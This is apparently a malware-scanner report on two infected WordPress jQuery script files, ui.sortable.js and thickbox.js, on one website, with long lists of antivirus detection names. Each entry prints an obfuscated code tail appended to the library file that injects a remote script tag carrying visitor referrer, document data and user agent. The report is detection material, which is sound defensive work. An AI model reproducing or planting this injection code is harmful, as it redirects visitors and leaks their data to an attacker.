http://ilovemonologic.com/info/wp-includes/js/jquery/ui.sortable.js?ver=1.8.9 | 200 OK Content-Length: 25099 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){d.widget("ui.sortable",d.ui.mouse,{widgetEventPrefix:"sort",options:{appendTo:"parent",axis:false,connectWith:false,containment:false,cursor:"auto",cursorAt:false,dropOnEmpty:true,forcePlaceholderSize:false,forceHelperSize:false,grid:false,handle:false,helper:"original",items:"> *",opacity:false,placeholder:false,revert:false,scroll:true,scrollSensitivity:20,scrollSpeed:20,scope:"default",tolerance:"intersect",zIndex:1E3},_create:function(){this.containerCache={};this.element.add
... 3075 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Agent-8
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- BitDefender
- Trojan.Agent.JS.DN
|
http://ilovemonologic.com/info/wp-includes/js/thickbox/thickbox.js?ver=3.1-20100407 | 200 OK Content-Length: 13668 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if ( typeof tb_pathToImage != 'string' ) { var tb_pathToImage = "../wp-includes/js/thickbox/loadingAnimation.gif"; } if ( typeof tb_closeImage != 'string' ) { var tb_closeImage = "../wp-includes/js/thickbox/tb-close.png"; } jQuery(document).ready(function(){ tb_init('a.thickbox, area.thickbox, input.thickbox'); imgLoader = new Image(); imgLoader.src = tb_pathToImage; }); function tb_init(domChunk){ jQuery(domChunk).live('click', tb_click); } fu
... 3376 bytes are skipped ...ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Antivirus reports:- AntiVir
- JS/Redirector.OM.2
- Avast
- JS:Decode-OG [Trj]
- Ad-Aware
- Trojan.Agent.JS.DN
- Rising
- JS:Trojan.Script.JS.Redirector.f!1609362
- nProtect
- Trojan.Agent.JS.DN
- K7AntiVirus
- Exploit ( 04c556d81 )
- TrendMicro-HouseCall
- JS_REDIR.FB
- Emsisoft
- Trojan.Agent.JS.DN (B)
- Comodo
- TrojWare.JS.Redirector.OM
- CAT-QuickHeal
- JS/Redirector.ID
- K7GW
- Exploit ( 04c556d81 )
- TrendMicro
- JS_REDIR.FB
- Microsoft
- Trojan:JS/Redirector.ID
- Kaspersky
- Trojan-Downloader.JS.JScript.ag
- MicroWorld-eScan
- Trojan.Agent.JS.DN
- Fortinet
- JS/JSRedir.DO!tr
- TotalDefense
- JS/Redirector.DL
- NANO-Antivirus
- Trojan.Script.Agent.lymqb
- ClamAV
- JS.Trojan.Downloader-2
- F-Secure
- Trojan.Agent.JS.DN
- VIPRE
- Trojan.JS.JScript.ag (v)
- F-Prot
- JS/Redir.AO
- AVG
- JS/Redir
- Norman
- Obfuscated.EB
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.Agent.JS.DN
- Symantec
- Trojan.Malscript!JS
- Commtouch
- JS/Redir.AO
- Agnitum
- JS.Srcid.Gen
- ESET-NOD32
- JS/Agent.NEQ
- BitDefender
- Trojan.Agent.JS.DN
|